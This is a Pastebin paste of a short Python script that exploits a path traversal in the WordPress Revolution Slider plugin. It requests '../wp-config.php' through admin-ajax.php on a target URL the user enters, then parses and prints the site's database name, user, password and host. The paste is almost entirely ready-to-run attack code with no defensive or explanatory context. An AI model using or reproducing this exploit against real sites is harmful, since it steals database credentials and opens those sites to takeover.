Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- # -*- coding: utf-8 -*-
- # Dev por: Anderson Barbosa // Raphael Rodriguez
- import re
- import urllib.request
- def handling(content):
- return content.split(", ")[1].lstrip("\\'").rstrip("\\'")
- target = input("URL: ")
- vull = "/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"
- print("[*] TARGET:", target)
- try:
- data = urllib.request.urlopen(target+vull)
- except:
- print("[!] ERROR: O target não é vulnerável")
- else:
- content = re.findall(r'define\((.+?)\);', str(data.read()))
- print("[+] DB_NOME:", handling(content[0]))
- print("[+] DB_USER:", handling(content[1]))
- print("[+] DB_PASS:", handling(content[2]))
- print("[+] DB_HOST:", handling(content[3]))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement